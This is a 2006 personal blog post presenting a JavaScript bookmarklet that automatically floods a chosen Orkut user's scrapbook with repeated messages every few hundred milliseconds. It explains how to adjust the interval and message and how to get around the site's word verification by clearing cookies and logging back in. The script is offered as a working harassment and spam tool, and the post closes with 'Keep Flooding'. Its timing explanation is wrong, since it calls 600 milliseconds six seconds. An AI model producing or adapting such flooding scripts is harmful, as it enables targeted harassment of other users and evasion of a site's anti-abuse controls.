Monday, December 04, 2006

Orkut Scraps Flooder...Orkut - II



Its part II of my series of tricks and tricks for Orkut...

When as a newbie to Orkut, I came across the term "Scrap Flooding" which soemwhat meant to be a way of irritating someone by flooding his\her scrapbook by tons of scraps having a lame message.........well, thts the definition I came across on onw of the communities there.
I instantly googled for Orkut scrap flooding........and came acroos some interesting results having some scripts written concerning the scrapbbok source

I tried almost every script available......with no results(even I tried them with IE, though I am a proud user of Firefox)

Most of those scripts available on net are patched.......

Having the knowledge of Javascript , I thought of developing a script of my own.......and as I have made this blog today itself, I am posting it here.......its working successfully........but sometimes orkut comes up with word verification ... for which I suggest logging out , then delete your browser's cache and cookies, log back in, scrap some more.......

LOL



Here's the script :-


javascript:var i=0; function flood(){i++;document.forms[1].elements[2].value="[b][red]L0rd Aryan Rules"+i; var node = document.createElement('input'); node.setAttribute("type", "submit"); node.setAttribute("name", "Action." + "submit");node.setAttribute("style", "display: none;"); document.forms[1].appendChild(node);node.click(); document.forms[0].removeChild(node);} void(setInterval(flood,600));



***The above script should be in a single statement***


Use this in your browser's address bar.......remember, with no line brakes...


Some useful tips about the script :-


  • 1) the time difference between the two scraps is defined by the last statement of the script , which is....
    void(setInterval(flood,600));
    In this statement, 600 means 6 seans........so enter your desired value , but whatever you put in , it'll be in milliseconds


  • 2) The message you want to scrap can be edited by editing this statement in the script...
    document.forms[1].elements[2].value="[b][silver]"+i;
    Only change the part enclosed within the double quotes, i.e., "[b][red]L0rd Aryan Rules", change it to anything like "Flooding"...i.e. you can customize this statement


Keep Flooding....

No comments: